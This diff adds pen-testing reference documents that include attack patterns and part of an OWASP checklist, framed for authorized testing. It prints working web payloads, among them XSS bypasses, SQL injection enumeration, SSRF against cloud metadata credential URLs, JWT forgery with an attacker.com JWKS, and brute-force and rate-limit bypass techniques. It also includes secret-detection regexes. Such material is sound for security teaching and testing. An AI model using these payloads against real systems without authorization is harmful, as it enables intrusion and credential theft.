+1. **Collect**: Run ecosystem audit tools, aggregate findings
+2. **Deduplicate**: Group by CVE ID across direct and transitive deps
+3. **Score**: Use CVSS base score + environmental adjustments
+4. **Prioritize**: Critical + exploitable + reachable = fix immediately
+5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
+6. **Verify**: Rerun audit to confirm fix, update lock files
+
+```bash
+# Use the dependency auditor for automated triage
+python scripts/dependency_auditor.py --file package.json --severity critical --json
+```
+
+### Known Vulnerable Patterns
+
+| Package | Vulnerable Versions | CVE | Impact |
+|---------|-------------------|-----|--------|
+| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
+| lodash | < 4.17.21 | CVE-2021-23337 | Prototype pollution |
+| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
+| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
+| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
+
+---
+
+## Secret Scanning
+
+### TruffleHog Patterns
+
+```bash
+# Scan git history for secrets
+trufflehog git file://. --only-verified --json
+
+# Scan filesystem (no git history)
+trufflehog filesystem . --json
+```
+
+### Gitleaks Configuration
+
+```toml
+# .gitleaks.toml
+title = "Custom Gitleaks Config"
+
+[[rules]]
+id = "aws-access-key"
+description = "AWS Access Key ID"
+regex = '''AKIA[0-9A-Z]{16}'''
+tags = ["aws", "credentials"]
+
+[[rules]]
+id = "generic-api-key"
+description = "Generic API Key"
+regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
+tags = ["api", "key"]
+
+[[rules]]
+id = "private-key"
+description = "Private Key Header"
+regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
+tags = ["private-key"]
+
+[allowlist]
+paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
+```
+
+### Pre-commit Hook Integration
+
+```yaml
+# .pre-commit-config.yaml
+repos:
+  - repo: https://github.com/gitleaks/gitleaks
+    rev: v8.18.0
+    hooks:
+      - id: gitleaks
+
+  - repo: https://github.com/trufflesecurity/trufflehog
+    rev: v3.63.0
+    hooks:
+      - id: trufflehog
+        args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
+```
+
+### CI Integration (GitHub Actions)
+
+```yaml
+name: Secret Scan
+on: [push, pull_request]
+jobs:
+  scan:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - uses: trufflesecurity/trufflehog@main
+        with:
+          extra_args: --only-verified
+```
+
+---
+
+## API Security Testing
+
+### Authentication Bypass
+
+**JWT Manipulation:**
+1. Decode token at jwt.io — inspect claims without verification
+2. Change `alg` to `none` and remove signature: `eyJ...payload.`
+3. Change `alg` from RS256 to HS256 and sign with the public key
+4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
+5. Test key confusion: HMAC signed with RSA public key bytes
+
+**Session Fixation:**
+1. Obtain a session token before authentication
+2. Authenticate — check if the session ID changes
+3. If the same session ID persists, the app is vulnerable to session fixation
+
+### Authorization Flaws
+
+**IDOR (Insecure Direct Object Reference):**
+```
+GET /api/users/123/profile → 200 (your profile)
+GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
+GET /api/users/124/profile → 403 (properly protected)
+```
+
+Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
+
+**BOLA (Broken Object Level Authorization):**
+Same as IDOR but specifically in REST APIs. Test every CRUD operation:
+- Can user A read user B's resource?
+- Can user A update user B's resource?
+- Can user A delete user B's resource?
+
+**BFLA (Broken Function Level Authorization):**
+```
+# Regular user tries admin endpoints
+POST /api/admin/users          → Should be 403
+DELETE /api/admin/users/123     → Should be 403
+PUT /api/settings/global        → Should be 403
+```
+
+### Rate Limiting Validation
+
+Test rate limits on critical endpoints:
+```bash
+# Rapid-fire login attempts
+for i in $(seq 1 100); do
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X POST https://target.com/api/login \
+    -d '{"email":"test@test.com","password":"wrong"}';
+done
+# Expect: 429 after threshold (typically 5-10 attempts)
+```
+
+### Mass Assignment Detection
+
+```bash
+# Try adding admin fields to a regular update request
+PUT /api/users/profile
+{
+  "name": "Normal User",
+  "email": "user@test.com",
+  "role": "admin",          # mass assignment attempt
+  "is_verified": true,      # mass assignment attempt
+  "subscription": "enterprise"  # mass assignment attempt
+}
+```
+
+### GraphQL-Specific Testing
+
+**Introspection Query:**
+```graphql
+{
+  __schema {
+    types { name fields { name type { name } } }
+  }
+}
+```
+Introspection should be **disabled in production**.
+
+**Query Depth Attack:**
+```graphql
+{
+  user(id: 1) {
+    friends {
+      friends {
+        friends {
+          friends { # Keep nesting until server crashes
+            name
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+**Batching Attack:**
+```json
+[
+  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
+]
+```
+Batch mutations can bypass rate limiting if counted as a single request.
+
+---
+
+## Web Vulnerability Testing
+
+### XSS (Cross-Site Scripting)
+
+**Reflected XSS Test Payloads** (non-destructive):
+```
+<script>alert(document.domain)</script>
+"><img src=x onerror=alert(document.domain)>
+javascript:alert(document.domain)
+<svg onload=alert(document.domain)>
+'-alert(document.domain)-'
+</script><script>alert(document.domain)</script>
+```
+
+**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.
+
+**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
+
+### CSRF Token Validation
+
+1. Capture a legitimate request with CSRF token
+2. Replay the request without the token — should fail (403)
+3. Replay with a token from a different session — should fail
+4. Check if token changes per request or is static per session
+5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax`
+
+### SQL Injection
+
+**Detection Payloads** (safe, non-destructive):
+```
+' OR '1'='1
+' OR '1'='1' --
+" OR "1"="1
+1 OR 1=1
+' UNION SELECT NULL--
+' AND SLEEP(5)--     (time-based blind)
+' AND 1=1--          (boolean-based blind)
+```
+
+**Union-Based Enumeration** (authorized testing only):
+```sql
+' UNION SELECT 1,2,3--                    -- Find column count
+' UNION SELECT table_name,2,3 FROM information_schema.tables--
+' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
+```
+
+**Time-Based Blind:**
+```sql
+' AND IF(1=1, SLEEP(5), 0)--     -- MySQL
+' AND pg_sleep(5)--               -- PostgreSQL
+' WAITFOR DELAY '0:0:5'--        -- MSSQL
+```
+
+### SSRF Detection
+
+**Payloads for SSRF testing:**
+```
+http://127.0.0.1
+http://localhost
+http://169.254.169.254/latest/meta-data/   (AWS metadata)
+http://metadata.google.internal/            (GCP metadata)
+http://169.254.169.254/metadata/instance    (Azure metadata)
+http://[::1]                                (IPv6 localhost)
+http://0x7f000001                           (hex encoding)
+http://2130706433                           (decimal encoding)
+```
+
+### Path Traversal
+
+```
+GET /api/files?name=../../../etc/passwd
+GET /api/files?name=....//....//....//etc/passwd
+GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
+GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd  (double encoding)
+```
+
+---
+
+## Infrastructure Security
+
+### Misconfigured Cloud Storage
+
+**S3 Bucket Checks:**
+```bash
+# Check for public read access
+aws s3 ls s3://target-bucket --no-sign-request
+
+# Check bucket policy
+aws s3api get-bucket-policy --bucket target-bucket
+
+# Check ACL
+aws s3api get-bucket-acl --bucket target-bucket
+```
+
+**Common Bucket Name Patterns:**
+```
+{company}-backup, {company}-dev, {company}-staging
+{company}-assets, {company}-uploads, {company}-logs
+```
+
+### HTTP Security Headers
+
+Required headers and expected values:
+
+| Header | Expected Value |
+|--------|---------------|
+| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
+| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
+| `X-Content-Type-Options` | `nosniff` |
+| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
+| `Referrer-Policy` | `strict-origin-when-cross-origin` |
+| `Permissions-Policy` | Restrict camera, microphone, geolocation |
+| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
+
+### TLS Configuration
+
+```bash
+# Check TLS version and cipher suites
+nmap --script ssl-enum-ciphers -p 443 target.com
+
+# Quick check with testssl.sh
+./testssl.sh target.com
+
+# Check certificate expiry
+echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
+```
+
+**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
+
+### Open Port Scanning
+
+```bash
+# Quick top-1000 ports
+nmap -sV target.com
+
+# Full port scan
+nmap -p- -sV target.com
+
+# Common dangerous open ports
+# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
+```
+
+---
+
+## Pen Test Report Generation
+
+Generate professional reports from structured findings:
+
+```bash
+# Generate markdown report from findings JSON
+python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
+
+# Generate JSON report
+python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
+```
+
+### Findings JSON Format
+
+```json
+[
+  {
+    "title": "SQL Injection in Login Endpoint",
+    "severity": "critical",
+    "cvss_score": 9.8,
+    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+    "category": "A03:2021 - Injection",
+    "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
+    "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
+    "impact": "Full database access, authentication bypass, potential remote code execution",
+    "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
+    "references": ["https://cwe.mitre.org/data/definitions/89.html"]
+  }
+]
+```
+
+### Report Structure
+
+1. **Executive Summary**: Business impact, overall risk level, top 3 findings
+2. **Scope**: What was tested, what was excluded, testing dates
+3. **Methodology**: Tools used, testing approach (black/gray/white box)
+4. **Findings Table**: Sorted by severity with CVSS scores
+5. **Detailed Findings**: Each with description, evidence, impact, remediation
+6. **Remediation Priority Matrix**: Effort vs. impact for each fix
+7. **Appendix**: Raw tool output, full payload lists
+
+---
+
+## Responsible Disclosure Workflow
+
+Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
+
+### Timeline
+
+| Day | Action |
+|-----|--------|
+| 0 | Discovery — document finding with evidence |
+| 1 | Report to vendor via security contact or bug bounty program |
+| 7 | Follow up if no acknowledgment received |
+| 30 | Request status update and remediation timeline |
+| 60 | Second follow-up — offer technical assistance |
+| 90 | Public disclosure (with or without fix, per industry standard) |
+
+### Key Principles
+
+1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
+2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
+3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
+4. **Document everything** — timestamps, screenshots, request/response pairs
+5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
+
+---
+
+## Workflows
+
+### Workflow 1: Quick Security Check (15 Minutes)
+
+For pre-merge reviews or quick health checks:
+
+```bash
+# 1. Generate OWASP checklist
+python scripts/vulnerability_scanner.py --target web --scope quick
+
+# 2. Scan dependencies
+python scripts/dependency_auditor.py --file package.json --severity high
+
+# 3. Check for secrets in recent commits
+# (Use gitleaks or trufflehog as described in Secret Scanning section)
+
+# 4. Review HTTP security headers
+curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
+```
+
+**Decision**: If any critical or high findings, block the merge.
+
+### Workflow 2: Full Penetration Test (Multi-Day Assessment)
+
+**Day 1 — Reconnaissance:**
+1. Map the attack surface: endpoints, authentication flows, third-party integrations
+2. Run automated OWASP checklist (full scope)
+3. Run dependency audit across all manifests
+4. Run secret scan on full git history
+
+**Day 2 — Manual Testing:**
+1. Test authentication and authorization (IDOR, BOLA, BFLA)
+2. Test injection points (SQLi, XSS, SSRF, command injection)
+3. Test business logic flaws
+4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
+
+**Day 3 — Infrastructure and Reporting:**
+1. Check cloud storage permissions
+2. Verify TLS configuration and security headers
+3. Port scan for unnecessary services
+4. Compile findings into structured JSON
+5. Generate pen test report
+
+```bash
+# Generate final report
+python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
+```
+
+### Workflow 3: CI/CD Security Gate
+
+Automated security checks that run on every pull request:
+
+```yaml
+# .github/workflows/security-gate.yml
+name: Security Gate
+on: [pull_request]
+jobs:
+  security:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      # Secret scanning
+      - name: Scan for secrets
+        uses: trufflesecurity/trufflehog@main
+        with:
+          extra_args: --only-verified
+
+      # Dependency audit
+      - name: Audit dependencies
+        run: |
+          npm audit --audit-level=high
+          pip audit --desc
+
+      # SAST
+      - name: Static analysis
+        uses: returntocorp/semgrep-action@v1
+        with:
+          config: >-
+            p/security-audit
+            p/secrets
+            p/owasp-top-ten
+
+      # Security headers check (staging only)
+      - name: Check security headers
+        if: github.base_ref == 'staging'
+        run: |
+          curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
+```
+
+**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
+
+---
+
+## Anti-Patterns
+
+1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
+2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
+3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
+4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
+5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
+6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
+7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
+8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
+
+---
+
+## Cross-References
+
+| Skill | Relationship |
+|-------|-------------|
+| [senior-secops](../senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
+| [senior-security](../senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
+| [dependency-auditor](../../engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
+| [code-reviewer](../code-reviewer/SKILL.md) | Code review practices — includes security review checklist |
--- a/engineering-team/security-pen-testing/references/attack_patterns.md
+++ b/engineering-team/security-pen-testing/references/attack_patterns.md
@@ -0,0 +1,549 @@
+# Attack Patterns Reference
+
+Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.
+
+---
+
+## XSS Test Payloads
+
+### Reflected XSS
+
+These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.
+
+**Basic payloads:**
+```
+<script>alert(document.domain)</script>
+"><script>alert(document.domain)</script>
+'><script>alert(document.domain)</script>
+<img src=x onerror=alert(document.domain)>
+<svg onload=alert(document.domain)>
+<body onload=alert(document.domain)>
+<input onfocus=alert(document.domain) autofocus>
+<marquee onstart=alert(document.domain)>
+<details open ontoggle=alert(document.domain)>
+```
+
+**Filter bypass payloads:**
+```
+<ScRiPt>alert(document.domain)</ScRiPt>
+<scr<script>ipt>alert(document.domain)</scr</script>ipt>
+<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
+<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
+<svg/onload=alert(document.domain)>
+javascript:alert(document.domain)//
+```
+
+**URL encoding payloads:**
+```
+%3Cscript%3Ealert(document.domain)%3C/script%3E
+%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
+```
+
+**Context-specific payloads:**
+
+Inside HTML attribute:
+```
+" onmouseover="alert(document.domain)
+' onfocus='alert(document.domain)' autofocus='
+```
+
+Inside JavaScript string:
+```
+';alert(document.domain);//
+\';alert(document.domain);//
+</script><script>alert(document.domain)</script>
+```
+
+Inside CSS:
+```
+expression(alert(document.domain))
+url(javascript:alert(document.domain))
+```
+
+### Stored XSS
+
+Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.
+
+```
+<img src=x onerror=alert(document.domain)>
+<a href="javascript:alert(document.domain)">click me</a>
+<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
+```
+
+### DOM-Based XSS
+
+Look for JavaScript that reads from these sources and writes to dangerous sinks:
+
+**Sources** (attacker-controlled input):
+```
+document.location
+document.location.hash
+document.location.search
+document.referrer
+window.name
+document.cookie
+localStorage / sessionStorage
+postMessage data
+```
+
+**Sinks** (dangerous output):
+```
+element.innerHTML
+element.outerHTML
+document.write()
+document.writeln()
+eval()
+setTimeout(string)
+setInterval(string)
+new Function(string)
+element.setAttribute("onclick", ...)
+location.href = ...
+location.assign(...)
+```
+
+**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.
+
+---
+
+## SQL Injection Detection Patterns
+
+### Detection Payloads
+
+**Error-based detection:**
+```
+'                          -- Single quote triggers SQL error
+"                          -- Double quote
+\                          -- Backslash
+' OR '1'='1               -- Boolean true
+' OR '1'='2               -- Boolean false (compare responses)
+' AND 1=1--               -- Boolean true with comment
+' AND 1=2--               -- Boolean false (compare responses)
+1 OR 1=1                  -- Numeric injection
+1 AND 1=2                 -- Numeric false
+```
+
+**Union-based enumeration** (authorized testing only):
+```sql
+-- Step 1: Find column count
+' ORDER BY 1--
+' ORDER BY 2--
+' ORDER BY 3--             -- Increment until error
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--  -- Match column count
+
+-- Step 2: Find displayable columns
+' UNION SELECT 'a',NULL,NULL--
+' UNION SELECT NULL,'a',NULL--
+
+-- Step 3: Extract database info
+' UNION SELECT version(),NULL,NULL--
+' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
+' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
+```
+
+**Time-based blind injection:**
+```sql
+-- MySQL
+' AND SLEEP(5)--
+' AND IF(1=1, SLEEP(5), 0)--
+' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)--
+
+-- PostgreSQL
+' AND pg_sleep(5)--
+'; SELECT pg_sleep(5)--
+' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
+
+-- MSSQL
+'; WAITFOR DELAY '0:0:5'--
+' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--
+```
+
+**Boolean-based blind injection:**
+```sql
+-- Extract data one character at a time
+' AND SUBSTRING(username,1,1)='a'--
+' AND ASCII(SUBSTRING(username,1,1))>96--
+' AND ASCII(SUBSTRING(username,1,1))>109--  -- Binary search
+```
+
+### Database-Specific Syntax
+
+| Feature | MySQL | PostgreSQL | MSSQL | SQLite |
+|---------|-------|------------|-------|--------|
+| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` |
+| Comment | `-- ` or `#` | `--` | `--` | `--` |
+| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` |
+| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A |
+| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A |
+
+---
+
+## SSRF Detection Techniques
+
+### Basic Payloads
+
+```
+http://127.0.0.1
+http://localhost
+http://0.0.0.0
+http://[::1]                            -- IPv6 localhost
+http://[0000::1]                        -- IPv6 localhost (expanded)
+```
+
+### Cloud Metadata Endpoints
+
+```
+# AWS EC2 Metadata (IMDSv1)
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+http://169.254.169.254/latest/user-data
+
+# AWS EC2 Metadata (IMDSv2 — requires token header)
+# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token
+# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/
+
+# GCP Metadata
+http://metadata.google.internal/computeMetadata/v1/
+http://169.254.169.254/computeMetadata/v1/
+
+# Azure Metadata
+http://169.254.169.254/metadata/instance?api-version=2021-02-01
+http://169.254.169.254/metadata/identity/oauth2/token
+
+# DigitalOcean Metadata
+http://169.254.169.254/metadata/v1/
+```
+
+### Bypass Techniques
+
+**IP encoding tricks:**
+```
+http://0x7f000001           -- Hex encoding of 127.0.0.1
+http://2130706433           -- Decimal encoding of 127.0.0.1
+http://0177.0.0.1           -- Octal encoding
+http://127.1                -- Shortened
+http://127.0.0.1.nip.io     -- DNS rebinding via nip.io
+```
+
+**URL parsing inconsistencies:**
+```
+http://127.0.0.1@evil.com   -- URL authority confusion
+http://evil.com#@127.0.0.1  -- Fragment confusion
+http://127.0.0.1%00@evil.com -- Null byte injection
+http://evil.com\@127.0.0.1  -- Backslash confusion
+```
+
+**Redirect chains:**
+```
+# If the app follows redirects, find an open redirect first:
+https://target.com/redirect?url=http://169.254.169.254/
+```
+
+---
+
+## JWT Manipulation Patterns
+
+### Decode Without Verification
+
+JWTs are Base64URL-encoded and can be decoded without the secret:
+```bash
+# Decode header
+echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
+# Output: {"alg":"HS256"}
+
+# Decode payload
+echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d
+# Output: {"user":"admin"}
+```
+
+### Algorithm Confusion Attacks
+
+**None algorithm attack:**
+```json
+// Original header
+{"alg": "HS256", "typ": "JWT"}
+
+// Modified header — set algorithm to none
+{"alg": "none", "typ": "JWT"}
+
+// Token format: header.payload. (empty signature)
+```
+
+**RS256 to HS256 confusion:**
+If the server uses RS256 (asymmetric), try:
+1. Get the server's RSA public key (from JWKS endpoint or TLS certificate)
+2. Change `alg` to `HS256`
+3. Sign the token using the RSA public key as the HMAC secret
+4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key
+
+### Claim Manipulation
+
+```json
+// Common claims to modify:
+{
+  "sub": "1234567890",    // Change to another user's ID
+  "role": "admin",         // Escalate from "user" to "admin"
+  "is_admin": true,        // Toggle admin flag
+  "exp": 9999999999,       // Extend expiration far into the future
+  "aud": "admin-api",      // Change audience
+  "iss": "trusted-issuer"  // Spoof issuer
+}
+```
+
+### Weak Secret Brute Force
+
+Common JWT secrets to try (if you have a valid token to test against):
+```
+secret
+password
+123456
+your-256-bit-secret
+jwt_secret
+changeme
+mysecretkey
+HS256-secret
+```
+
+Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks.
+
+### JWKS Injection
+
+If the server fetches keys from a JWKS URL in the JWT header:
+```json
+{
+  "alg": "RS256",
+  "jku": "https://attacker.com/.well-known/jwks.json"
+}
+```
+Host your own JWKS with a key pair you control.
+
+---
+
+## API Authorization Testing (IDOR, BOLA)
+
+### IDOR Testing Methodology
+
+**Step 1: Identify resource identifiers**
+Map all API endpoints and find parameters that reference resources:
+```
+GET /api/users/{id}/profile
+GET /api/orders/{orderId}
+GET /api/documents/{docId}/download
+PUT /api/users/{id}/settings
+DELETE /api/comments/{commentId}
+```
+
+**Step 2: Create two test accounts**
+- User A (attacker) and User B (victim)
+- Authenticate as both and capture their tokens
+
+**Step 3: Cross-account access testing**
+Using User A's token, request User B's resources:
+```
+# Read
+GET /api/users/{B_id}/profile     → Should be 403
+GET /api/orders/{B_orderId}       → Should be 403
+
+# Write
+PUT /api/users/{B_id}/settings    → Should be 403
+PATCH /api/orders/{B_orderId}     → Should be 403
+
+# Delete
+DELETE /api/comments/{B_commentId} → Should be 403
+```
+
+**Step 4: ID manipulation**
+```
+# Sequential IDs — increment/decrement
+/api/users/100 → /api/users/101
+
+# UUID prediction — not practical, but test for leaked UUIDs
+# Check if UUIDs appear in other responses
+
+# Encoded IDs — decode and modify
+/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx
+
+# Hash-based IDs — check for predictable hashing
+/api/users/md5(email) → compute md5 of known emails
+```
+
+### BFLA (Broken Function Level Authorization)
+
+Test access to administrative functions:
+```
+# As regular user, try admin endpoints:
+POST   /api/admin/users                → 403
+DELETE /api/admin/users/123            → 403
+PUT    /api/admin/settings             → 403
+GET    /api/admin/reports              → 403
+POST   /api/admin/impersonate/user123  → 403
+
+# Try HTTP method override:
+GET /api/admin/users with X-HTTP-Method-Override: DELETE
+POST /api/admin/users with _method=DELETE
+```
+
+### Mass Assignment Testing
+
+```json
+// Normal user update request:
+PUT /api/users/profile
+{
+  "name": "Normal User",
+  "email": "user@test.com"
+}
+
+// Mass assignment attempt — add privileged fields:
+PUT /api/users/profile
+{
+  "name": "Normal User",
+  "email": "user@test.com",
+  "role": "admin",
+  "is_verified": true,
+  "is_admin": true,
+  "balance": 99999,
+  "subscription": "enterprise",
+  "permissions": ["admin", "superadmin"]
+}
+
+// Then check if any extra fields were persisted:
+GET /api/users/profile
+```
+
+---
+
+## GraphQL Security Testing Patterns
+
+### Introspection Query
+
+Use this to map the entire schema (should be disabled in production):
+```graphql
+{
+  __schema {
+    queryType { name }
+    mutationType { name }
+    types {
+      name
+      kind
+      fields {
+        name
+        type {
+          name
+          kind
+          ofType { name kind }
+        }
+        args { name type { name } }
+      }
+    }
+  }
+}
+```
+
+### Query Depth Attack
+
+Nested queries can cause exponential resource consumption:
+```graphql
+{
+  users {
+    friends {
+      friends {
+        friends {
+          friends {
+            friends {
+              friends {
+                name
+              }
+            }
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth."
+
+### Query Complexity Attack
+
+Wide queries with aliases:
+```graphql
+{
+  a: users(limit: 1000) { name email }
+  b: users(limit: 1000) { name email }
+  c: users(limit: 1000) { name email }
+  d: users(limit: 1000) { name email }
+  e: users(limit: 1000) { name email }
+}
+```
+
+### Batch Query Attack
+
+Send multiple operations in a single request to bypass rate limiting:
+```json
+[
+  {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"},
+  {"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"}
+]
+```
+
+### Field Suggestion Exploitation
+
+GraphQL often suggests similar field names on typos:
+```graphql
+{ users { passwor } }
+# Response: "Did you mean 'password'?"
+```
+
+Use this to discover hidden fields without full introspection.
+
+### Authorization Bypass via Fragments
+
+```graphql
+query {
+  publicUser(id: 1) {
+    name
+    ...on User {
+      email           # Should be restricted
+      ssn             # Should be restricted
+      creditCard      # Should be restricted
+    }
+  }
+}
+```
+
+---
+
+## Rate Limiting Bypass Techniques
+
+These techniques help verify that rate limiting is robust during authorized testing:
+
+```
+# IP rotation — test if rate limiting is per-IP only
+X-Forwarded-For: 1.2.3.4
+X-Real-IP: 1.2.3.4
+X-Originating-IP: 1.2.3.4
+
+# Case variation — test if endpoints are case-sensitive
+/api/login
+/API/LOGIN
+/Api/Login
+
+# Path variation
+/api/login
+/api/login/
+/api/./login
+/api/login?dummy=1
+
+# HTTP method variation
+POST /api/login
+PUT /api/login
+
+# Unicode encoding
+/api/logi%6E
+```
+
+If any of these bypass rate limiting, the implementation needs hardening.
--- a/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md
+++ b/engineering-team/security-pen-testing/references/owasp_top_10_checklist.md
@@ -0,0 +1,440 @@
+# OWASP Top 10 (2021) — Detailed Security Checklist
+
+Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance.
+
+---
+
+## A01:2021 — Broken Access Control
+
+**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863
+
+### Description
+
+Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits.
+
+### Test Procedures
+
+| # | Test | Method | Expected Result |
+|---|------|--------|-----------------|
+| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden |
+| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden |
+| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins |
+| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 |
+| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method |
+| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized |
+| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal |
+| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond |
+
+### Code Patterns to Detect
+
+```python
+# BAD: No authorization check on resource access
+@app.route("/api/documents/<doc_id>")
+def get_document(doc_id):
+    return Document.query.get(doc_id).to_json()  # No ownership check!
+
+# GOOD: Verify ownership
+@app.route("/api/documents/<doc_id>")
+@login_required
+def get_document(doc_id):
+    doc = Document.query.get_or_404(doc_id)
+    if doc.owner_id != current_user.id:
+        abort(403)
+    return doc.to_json()
+```
+
